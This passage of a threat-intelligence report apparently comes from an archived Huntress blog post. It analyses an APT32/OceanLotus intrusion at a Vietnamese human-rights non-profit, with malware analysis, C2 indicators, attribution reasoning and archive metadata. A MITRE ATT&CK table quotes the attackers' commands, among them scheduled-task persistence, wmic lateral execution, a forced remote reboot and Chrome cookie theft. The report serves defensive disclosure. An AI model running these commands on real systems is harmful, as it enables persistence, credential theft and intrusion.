It’s noted that there were a number of differences between this version of the Steganography Loader and the one previously reported which included use of LZNT1 instead of LZMA, and a hardcoded XOR key of 0xFF instead of it being retrieved from a file on disk.\r\nThe malware also had significant overlap with a sample analyzed by a security researcher back in March of 2019, and it’s highly likely both malware samples are from the same malware family. At the time of investigation, the host had active connections to 185.198.57[.]184 and 185.43.220[.]188 on port 8888 from the DllHost process running the COM object backdoor.\r\nPassive DNS information for the IP address 185.198.57[.]184 showed that domains mentioned in the security researcher’s blog from 2019 resolved to this IP address. This helps to validate that the malware described in their blog is the same malware found on this system 5 years later. It’s also worth mentioning that none of the domains appear to have lapsed or have been re-registered, and the domains were all originally registered in late 2017. 
This indicates that the below domains have likely been under control of the same threat actor for almost 7 years.\r\ncdn.arlialter[.]com - Domain originally registered: 2017-10-27\r\nfbcn.enantor[.]com - Domain originally registered: 2017-10-27\r\nww1.erabend[.]com - Domain originally registered: 2017-10-27\r\nvar.alieras[.]com - Domain originally registered: 2017-10-27\r\nThe domains also appear to masquerade as legitimate domains, which is notable given APT32/OceanLotus has previously used this technique throughout their intrusions.\r\nDomain | Legitimate Domain\r\nalieras[.]com | alier[.]com\r\nenantor[.]com | emantor[.]com\r\nerabend[.]com | erbend[.]com\r\nThe host was also found to have another four scheduled tasks which were masquerading as various services with identical descriptions. These tasks had a similar naming convention to previously seen scheduled tasks. In addition, a user run key also had a similar naming convention:\r\nScheduled Task 1\r\nTask Path: Microsoft Compatibility Appraiser_{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\r\nDescription: Collects program telemetry information if opted-in to the Microsoft Customer Experience Improvement Program.\r\nCOM Handler: {8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\r\nTask File Creation Date: 2020-01-14\r\nScheduled Task 2\r\nTask Path: Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)_{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nDescription: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. 
In this case, it fails silently.\r\nCOM Handler: {2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nTask File Creation Date: 2019-08-13\r\nScheduled Task 3\r\nTask Path: AD RMS Rights Policy Template Management (Automated)_{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nDescription: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.\r\nCOM Handler: {2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nTask File Creation Date: 2019-08-13\r\nScheduled Task 4\r\nTask Path: Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Automated)_{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nDescription: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.\r\nCOM Handler: {2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nTask File Creation Date: 2019-08-13\r\nNote: This scheduled task is identical to another scheduled task created except it has the control character 0x9d at the end of it.\r\nRun Key 1\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: DropboxUpdate_{02594FE8-1152-E41E-A75E-923494C7B453}\r\nPath: c:\\users\\\u003cREDACTED\u003e\\appdata\\roaming\\microsoft\\installer\\{02594fe8-1152-e41e-a75e-923494c7b453}\\dropboxupdate.exe\r\nCommand: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\{02594FE8-1152-E41E-A75E-923494C7B453}\\DropboxUpdate.exe /installsource taggedmi\r\nBinary Creation Date: 2019-11-14\r\nExamining host 1’s scheduled tasks found another two instances of the malicious COM backdoor registered. 
These would no longer run the malicious code hidden within logo.png as the required malicious iisutil2.dll had been removed from the system. It’s suspected that multiple variants of the backdoor were established on the system over time to help ensure access remained even if AV products picked up on some of the existing backdoors.\r\nAmongst the scheduled tasks was a DropboxUpdate task pointing to a legitimate executable. Although DropboxUpdate doesn’t directly import and use goopdate.dll, this is indirectly called and loaded by DropboxUpdate which is then used to load a malicious DropboxUpdate.bin file in the same directory as shown below in Figure 15.\r\nFigure 15: ProcMon view of process activity\r\nAnalysis of process memory found multiple domains and C2 configuration details for this malware:\r\nFigure 16: View of DropboxUpdate.exe process’ memory\r\nThese domains once again masqueraded as legitimate domains.\r\nDomain | Legitimate Domain\r\npopfan[.]com | Various\r\nsetalz[.]com | setabz[.]com\r\nriceaub[.]com | riceau[.]com\r\neatherurg[.]com | ethereum[.]org\r\nThe malicious DLL goopdate.dll is more than 20MB in size and makes a check for a hardcoded GUID environment variable on the system. If it’s not present it will be set. 
This is done before setting memory permissions to RWX to allow injecting the .bin payload into memory.\r\nFigure 17: Disassembly: View of Injection of .bin payload\r\nOf note is that this DLL has a function at offset 0x0001010 which uses a hardcoded list of names in this injection routine. Specifically, it will take the last name in the array and concatenate it with all the other names which is then evaluated prior to injection.\r\nFigure 18: Disassembly: View of hardcoded list of names in injection routine\r\nNo specific overlaps were seen with previously reported malicious goopdate.dll files used by APT32/OceanLotus. Despite this, Facebook, Cybereason, and Volexity have all previously reported the use of APT32/OceanLotus using a malicious goopdate.dll which was loaded into a benign executable. It’s worth noting that this technique and DLL name are also used amongst other threat actors.\r\nExamining the JAR files adobe.jar and msadobe.jar found these to be simple loaders that would run specific embedded DLLs into memory from a main class called UpdateData.\r\nFigure 19: View of embedded DLL mi54giwp.dll\r\nFigure 20: View of embedded DLL zfhqq01v.dll in decompiled msadobe.jar\r\nFigure 21: View of code of UpdateData\r\nLooking at the DLL mi54giwp.dll found it would create a Mutex with the value okSSjZzAlnNOlQaGoDWx prior to targeting a .bin file located within a directory hardcoded into the DLL. This highlights the malware had been created specifically to target the system it was run on. 
\r\nFigure 22: Disassembly of mi54giwp.dll, which shows creation of Mutex\r\nFigure 23: View of hardcoded file paths by mi54giwp.dll\r\nSimilar behavior was found in the DLL zfhqq01v.dll which creates a Mutex with the value sbvjJpGLbbmnHNfWEetm prior to targeting a .bin file located within a different user account directory hardcoded into the DLL.\r\nFigure 24: Disassembly of zfhqq01v.dll, which shows Mutex creation\r\nWhilst examining host 1 it was found that persistence had previously been set up to run a suspicious executable from a user run key. This executable was quarantined by Windows Defender.\r\nRun Key 2\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: Trusted Platform Console\r\nCommand: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\TPM Console\\TpmInit.exe\r\nOf note is that the “TPM Console” directory had three files in it with varying modification timestamps which are of interest when it comes to timelining this incident.\r\nFile | Modification Timestamp\r\nTpmInit.db | \u003cREDACTED\u003e\r\nTpmInit.mdb | 2017-02-07 23:54:29\r\nTpmInit.mdf | 2017-02-07 23:54:29\r\nAnalysis of the quarantined TpmInit.exe found that this was a modified version of a legitimate TpmInit executable. 
This executable when initially run will create two files TpmInit.mdb and TpmInit.mdf on disk if they’re not present before terminating, at which point these files will no longer be modified.\r\nFigure 25: Analysis of TpmInit.exe, showing creation of TpmInit.mdf and TpmInit.mdb\r\nFigure 26: Differences between TpmInit.mdf and TpmInit.mdb\r\nAlthough it’s unknown whether this executable was related to the same intrusion, modification timestamps indicate this malware may have been present and running on the host since 2017. If both TPMInit.mdb and TPMInit.mdf are present when the executable is run, TpmInit.db (a DLL) is dropped from TpmInit.exe and run using rundll32.exe after first injecting into another rundll32 process. This file will have its modification timestamp change every time the executable is run, indicating a potential first and last time this malware was executed on the system.\r\nTo execute TpmInit.db, the malware leverages the legitimate rundll32 application to run an exported function called ‘TpmVCardCreate’. It’s worth noting that the exports in this DLL are named after a subset of exports found in a legitimate tpmvsc.dll usually found on Windows.\r\nFigure 27: Export Table of TpmInit.db, showing the TpmVCardCreate function\r\nAfter execution, this would get a handle to kernel32.dll to get the address of modules to be used and check to see if Kaspersky AV (avp.exe) and AVG (avghookx.dll) were running on the system, as seen in Figure 28.\r\nFigure 28: Analysis showing check for Kaspersky AV\r\nLater on, this opens a handle to explorer.exe, creates a new thread, and injects the contents of a file on disk at C:\\Users\\\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\MicrosoftEdge\\container.dat into memory. 
At the time of investigation, this file wasn’t found on disk.\r\nFigure 29: Analysis showing check for container.dat\r\nAnalysis of Infrastructure\r\nExamining the two suspected Cobalt Strike Team Server IP addresses found that both were signed with Let’s Encrypt certificates and were sitting behind a Cloudflare Load Balancer. Of interest is that the servers would present a 404 Not Found message with a Content-Length of 0 whenever a GET request with a URI containing a ‘/’ was sent. The servers would also present a 200 response with a Content-Length of 0, and the allowed methods OPTIONS, GET, HEAD, POST whenever an OPTIONS request was sent. This is significant because the same behavior is expected when you’re interacting with a Cobalt Strike Team Server as previously reported by Palo Alto Networks.\r\nThe combination of specific response headers and Cloudflare Load Balancer led to a unique service banner which was seen across both of the suspected Cobalt Strike C2 IP addresses through a Censys search, seen in Figure 30.\r\nFigure 30: Service banner seen on Censys for 51.81.29[.]44\r\nFigure 31: Service banner seen on Censys for 5.230.35[.]192\r\nA search for this banner found only seven hosts, making this a fairly unique fingerprint. 
Looking for only hosts that were identified by both a name and an IP address found three unique IP addresses and domains, of which only one hadn’t been seen in this intrusion.\r\nFigure 32: Analysis of the banner hash\r\nInterestingly, all of these IP addresses had domain names which looked to be masquerading as legitimate websites or software, and none of the ASNs or service providers overlapped.\r\nTargeting and Attribution\r\nIt’s long been reported that journalists, bloggers, dissidents, and Vietnamese human rights advocates have been targeted by malware and tactics consistent with APT32/OceanLotus operations dating back to at least 2013. This has been reported by companies such as Google, the Electronic Frontier Foundation, Amnesty International, and a large number of other security vendors. During our investigation a number of overlaps were found between known techniques used by APT32/OceanLotus, the target verticals and interests of this threat actor, and what was found in this intrusion:\r\nThe target was a non-profit supporting Vietnamese human rights.\r\nThe malware in question used a malicious DLL which was loaded by an IIS Express DLL named iisutil.dll. This has overlap with a YARA rule created by Nextron Systems that points towards the threat actor APT32/OceanLotus.\r\nThe malicious DLL used in this intrusion used a modified version of iisutil with the entry point 0x00025FB0 (155568) and a function at 0x1002711e. All code in the malware is identical to malware uploaded to VirusTotal noted to be associated with APT32/OceanLotus besides extra padding appended to it.\r\nPorts 8888 and 8531 were used within the malware C2 configuration. 
The COM object backdoor aligns with public reporting by a security researcher from 2019 where the final payload contained eight possible C2 server addresses with identical port numbers.\r\nThe use of hardcoded C2 addresses in a DLL resource has known overlap with malware used by APT32/OceanLotus as reported by BlackBerry/Cylance.\r\nThe use of COM objects and Steganography using PNG files is a known technique reported to be used by APT32/OceanLotus as reported by BlackBerry/Cylance.\r\nAlternate Data Streams with the name log.txt were appended to a PowerShell script and loaded by wscript through a scheduled task. This has a naming convention similar to a publicly reported campaign attributed to APT32/OceanLotus ‘Operation Cobalt Kitty’ by Cybereason.\r\nCobalt Strike is suspected to have been used by the threat actor by loading a malicious DLL into a legitimate executable, a known technique used by APT32/OceanLotus.\r\nFacebook, Cybereason, and Volexity have all reported the use of APT32/OceanLotus using a malicious goopdate.dll loading into a benign executable.\r\nAPT32/OceanLotus has been known to use unique CLSIDs, Binary Padding, compression, and Scheduled Tasks in their intrusions as reported by ESET. 
The naming conventions used in their malware are also similar.\r\nAPT32/OceanLotus has been known to use lots of unique domains and infrastructure with minimal overlap to help remain in environments for long periods of time which aligns with what we’ve seen here.\r\nAPT32/OceanLotus has been known to incorporate Java-based malware into their operations.\r\nAPT32/OceanLotus has previously used garbage op-codes in their malware to throw off analysis, and control flow obfuscation as reported by ESET.\r\nAPT32/OceanLotus has previously used the McAfee OEM module to sideload malicious DLLs as reported by ESET.\r\nAPT32/OceanLotus has previously used Cobalt Strike servers behind Cloudflare as reported by Cybereason and Volexity.\r\nAPT32/OceanLotus has previously used the Apple Software Update binary to sideload malicious DLLs as reported by Recorded Future.\r\nAPT32/OceanLotus has previously heavily used Let’s Encrypt TLS certificates in its infrastructure as reported by Volexity.\r\nMITRE ATT\u0026CK Mapping\r\nIndicator | MITRE ATT\u0026CK | Note\r\nwhoami /priv | T1033: System Owner/User Discovery\r\nschtasks  /create /sc minute /mo 300 /tn Handler{60396-307392-03497-03790-3702046} /tr \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\cloud.bat\" /f | T1053.005: Scheduled Task/Job: Scheduled Task\r\ncmd.exe /c C:\\Users\\Public\\Downloads\\1.bat | T1059.003: Command and Scripting Interpreter: Windows Command Shell; T1047: Windows Management Instrumentation; T1057: Process Discovery | 1.bat was being launched via Windows Management Instrumentation to enumerate processes\r\nnet  group \"Domain Admins\" /domain | T1087.002: Account Discovery: Domain Account; T1069.002: Permission Groups Discovery: Domain Groups\r\nnltest  /dclist:\u003cREDACTED\u003e.local | T1018: Remote System Discovery\r\nschtasks  /create /sc MINUTE /mo 300 /tn \"Microsoft\\Windows\\WindowsColorSystem\\Calibration_Update\" /tr \"C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\Calibre.exe\" /f | T1053.005: Scheduled Task/Job: Scheduled Task; T1574.002: Hijack Execution Flow: DLL Side-Loading; T1036.004: Masquerading: Masquerade Task or Service; T1036.005: Masquerading: Match Legitimate Name or Location\r\ncmd.exe /c echo a0e3d8a67d0 \u003e \\.\\pipe\\a64009 | T1134.001: Access Token Manipulation: Token Impersonation/Theft; T1559: Inter-Process Communication\r\nwmic  /node:\u003cREDACTED\u003e /user:\u003cREDACTED\u003e /password:\u003cREDACTED\u003e process call create \"cmd.exe /c start c:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\" | T1047: Windows Management Instrumentation; T1078.002: Valid Accounts: Domain Accounts\r\ncmd /c shutdown /r /m \\\\\u003cREDACTED\u003e /t 0 /f | T1529: System Shutdown/Reboot\r\nipconfig /all | T1016: System Network Configuration Discovery\r\nnet view | T1135: Network Share Discovery\r\nnet use | T1021.002: Remote Services: SMB/Windows Admin Shares\r\nnetstat -ano | T1049: System Network Connections Discovery\r\nschtasks  /create /sc MINUTE /mo 15 /tn \"96d09a49-98ed-4b12-936a-c8715d2d2c0e\" /tr \"C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\bin\\javaw.exe -jar C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar zfhqq01v\" /f | T1053.005: Scheduled Task/Job: Scheduled Task; T1036.005: Masquerading: Match Legitimate Name or Location\r\nnet  view \\\\\u003cREDACTED\u003e /all | T1135: Network Share Discovery\r\nnet  use \\\\\u003cREDACTED\u003e /u:\u003cREDACTED\u003e \u003cREDACTED\u003e | T1021.002: Remote Services: SMB/Windows Admin Shares; T1078.002: Valid Accounts: Domain Accounts\r\ncmd /c for /f \"tokens=*\" %G in ('dir /b \"%localappdata%\\Google\\Chrome\\User Data\\Profile *\"') do copy \"%localappdata%\\Google\\Chrome\\User Data%G\\Network\\Cookies.bak\" \"%localappdata%\\Google\\Chrome\\User Data%G\\Cookies\" /y | T1555.003: Credentials from Password Stores: Credentials from Web Browsers; T1539: Steal Web Session Cookie\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft Compatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\cachuri.dll | T1546.015: Event Triggered Execution: Component Object Model Hijacking; T1559.001: Inter-Process Communication: Component Object Model; T1036.004: Masquerading: Masquerade Task or Service; T1036.005: Masquerading: Match Legitimate Name or Location | HKU\\Software\\Classes\\WOW6432N {8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\InProcServer32\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\cachuri.dll | T1546.015: Event Triggered Execution: Component Object Model Hijacking; T1559.001: Inter-Process Communication: Component Object Model; T1036.004: Masquerading: Masquerade Task or Service; T1036.005: Masquerading: Match Legitimate Name or Location | HKU\\Software\\Classes\\WOW6432N {1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\InProcServer32\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights Policy Template Management (Automated)\\{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\\cachuri.dll | T1546.015: Event Triggered Execution: Component Object Model Hijacking; T1559.001: Inter-Process Communication: Component Object Model; T1036.004: Masquerading: Masquerade Task or Service; T1036.005: Masquerading: Match Legitimate Name or Location | HKU\\Software\\Classes\\WOW6432N {2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\\InProcServer32\r\nc:\\users\\\u003cREDACTED\u003e\\appdata\\roaming\\microsoft\\installer\\{02594fe8-1152-e41e-a75e-923494c7b453}\\dropboxupdate.exe | T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder; T1574.002: Hijack Execution Flow: DLL Side-Loading | DropboxUpdate_{02594FE8-1152-E41E-A75E-923494C7B453}\r\nc:\\windows\\sysnative\\gpupdate.exe | T1055: Process Injection | Cobalt Strike uses a Fork and Run m inject into gpupdate.exe\r\nC:\\programdata\\adobe\\node.exe -e require('C:\\ProgramData\\adobe\\1lpiozkc.node') | T1218.007: System Binary Proxy Execution: JavaScript\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\iisutil2.dll | T1027.001: Obfuscated Files or Information: Binary Padding; T1129: Shared Modules; T1027.007: Obfuscated Files or Information: Dynamic API Resolution; T1027.013: Obfuscated Files or Information: Encrypted/Encoded File; T1036.004: Masquerading: Masquerade Task or Service; T1036.005: Masquerading: Match Legitimate Name or Location\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft Compatibility Appraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\iisexpressshim.sdb; C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-B558-4EBD-9526-203135A79B1D}\\logo.png | T1027.003: Obfuscated Files or Information: Steganography; T1036.008: Masquerading: Masquerade File Type | Masqueraded as a legitimate sdb file on extension\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\MSSharePoint.vbs | T1105: Ingress Tool Transfer; T1059.005: Command and Scripting Interpreter: Visual Basic | VBS script was used to download fi remote C2 server over SSH\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\WdiServiceHost_339453944\\WdiServiceHost.exe | T1574.002: Hijack Execution Flow: DLL Side-Loading; T1036.004: Masquerading: Masquerade Task or Service; T1036.005: Masquerading: Match Legitimate Name or Location\r\nC:\\ProgramData\\Apple\\Installer Cache\\SoftwareUpdate.exe | T1574.002: Hijack Execution Flow: DLL Side-Loading; T1036.004: Masquerading: Masquerade Task or Service\r\nService: Adobe_Reader | T1543.003: Create or Modify System Process: Windows Service\r\nTpmInit.exe | T1218.011: System Binary Proxy Execution: Rundll32; T1036.005: Masquerading: Match Legitimate Name or Location | TpmInit.exe launched and executed DLL through the use of Rundll32.exe\r\n51.81.29[.]44 | T1573.002: Asymmetric Cryptography | Infrastructure behind IP addresses us Cobalt Strike leverage TLS certifica traffic\r\n51.81.29[.]44; cdn.arlialter[.]com; fbcn.enantor[.]com; ww1.erabend[.]com; var.alieras[.]com | T1583.004: Acquire Infrastructure: Server; T1583.001: Acquire Infrastructure: Domains\r\nSource: https://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders"
	],
	"report_names": [
		"advanced-persistent-threat-targeting-vietnamese-human-rights-defenders"
	],
	"threat_actors": [
		{
			"id": "af509bbb-8d18-4903-a9bd-9e94099c6b30",
			"created_at": "2023-01-06T13:46:38.585525Z",
			"updated_at": "2026-04-10T02:00:03.030833Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"OceanLotus",
				"ATK17",
				"G0050",
				"APT-C-00",
				"APT-32",
				"Canvas Cyclone",
				"SeaLotus",
				"Ocean Buffalo",
				"OceanLotus Group",
				"Cobalt Kitty",
				"Sea Lotus",
				"APT 32",
				"POND LOACH",
				"TIN WOODLAWN",
				"Ocean Lotus"
			],
			"source_name": "MISPGALAXY:APT32",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3cc6c262-df23-4075-a93f-b496e8908eb2",
			"created_at": "2022-10-25T16:07:23.682239Z",
			"updated_at": "2026-04-10T02:00:04.708878Z",
			"deleted_at": null,
			"main_name": "GhostNet",
			"aliases": [
				"GhostNet",
				"Snooping Dragon"
			],
			"source_name": "ETDA:GhostNet",
			"tools": [
				"AngryRebel",
				"Farfli",
				"Gh0st RAT",
				"Gh0stnet",
				"Ghost RAT",
				"Ghostnet",
				"Moudour",
				"Mydoor",
				"PCRat",
				"Remosh",
				"TOM-Skype"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e91dae30-a513-4fb1-aace-4457466313b3",
			"created_at": "2023-01-06T13:46:38.974913Z",
			"updated_at": "2026-04-10T02:00:03.168521Z",
			"deleted_at": null,
			"main_name": "GhostNet",
			"aliases": [
				"Snooping Dragon"
			],
			"source_name": "MISPGALAXY:GhostNet",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "870f6f62-84f5-48ca-a18e-cf2902cd6924",
			"created_at": "2022-10-25T15:50:23.303818Z",
			"updated_at": "2026-04-10T02:00:05.301184Z",
			"deleted_at": null,
			"main_name": "APT32",
			"aliases": [
				"APT32",
				"SeaLotus",
				"OceanLotus",
				"APT-C-00",
				"Canvas Cyclone"
			],
			"source_name": "MITRE:APT32",
			"tools": [
				"Mimikatz",
				"ipconfig",
				"Kerrdown",
				"Cobalt Strike",
				"SOUNDBITE",
				"OSX_OCEANLOTUS.D",
				"KOMPROGO",
				"netsh",
				"RotaJakiro",
				"PHOREAL",
				"Arp",
				"Denis",
				"Goopy"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "5da6b5fd-1955-412a-81aa-069fb50b6e31",
			"created_at": "2025-08-07T02:03:25.116085Z",
			"updated_at": "2026-04-10T02:00:03.668978Z",
			"deleted_at": null,
			"main_name": "TIN WOODLAWN",
			"aliases": [
				"APT32 ",
				"Cobalt Kitty",
				"OceanLotus",
				"WOODLAWN "
			],
			"source_name": "Secureworks:TIN WOODLAWN",
			"tools": [
				"Cobalt Strike",
				"Denis",
				"Goopy",
				"JEShell",
				"KerrDown",
				"Mimikatz",
				"Ratsnif",
				"Remy",
				"Rizzo",
				"RolandRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2439ad53-39cc-4fff-8fdf-4028d65803c0",
			"created_at": "2022-10-25T16:07:23.353204Z",
			"updated_at": "2026-04-10T02:00:04.55407Z",
			"deleted_at": null,
			"main_name": "APT 32",
			"aliases": [
				"APT 32",
				"APT-C-00",
				"APT-LY-100",
				"ATK 17",
				"G0050",
				"Lotus Bane",
				"Ocean Buffalo",
				"OceanLotus",
				"Operation Cobalt Kitty",
				"Operation PhantomLance",
				"Pond Loach",
				"SeaLotus",
				"SectorF01",
				"Tin Woodlawn"
			],
			"source_name": "ETDA:APT 32",
			"tools": [
				"Agentemis",
				"Android.Backdoor.736.origin",
				"AtNow",
				"Backdoor.MacOS.OCEANLOTUS.F",
				"BadCake",
				"CACTUSTORCH",
				"CamCapture Plugin",
				"CinaRAT",
				"Cobalt Strike",
				"CobaltStrike",
				"Cuegoe",
				"DKMC",
				"Denis",
				"Goopy",
				"HiddenLotus",
				"KOMPROGO",
				"KerrDown",
				"METALJACK",
				"MSFvenom",
				"Mimikatz",
				"Nishang",
				"OSX_OCEANLOTUS.D",
				"OceanLotus",
				"PHOREAL",
				"PWNDROID1",
				"PhantomLance",
				"PowerSploit",
				"Quasar RAT",
				"QuasarRAT",
				"RatSnif",
				"Remy",
				"Remy RAT",
				"Rizzo",
				"Roland",
				"Roland RAT",
				"SOUNDBITE",
				"Salgorea",
				"Splinter RAT",
				"Terracotta VPN",
				"Yggdrasil",
				"cobeacon",
				"denesRAT",
				"fingerprintjs2"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775441494,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/852cbe8c6c47d67b263065f52eb34b409d2a4f7a.pdf",
		"text": "https://archive.orkl.eu/852cbe8c6c47d67b263065f52eb34b409d2a4f7a.txt",
		"img": "https://archive.orkl.eu/852cbe8c6c47d67b263065f52eb34b409d2a4f7a.jpg"
	}
}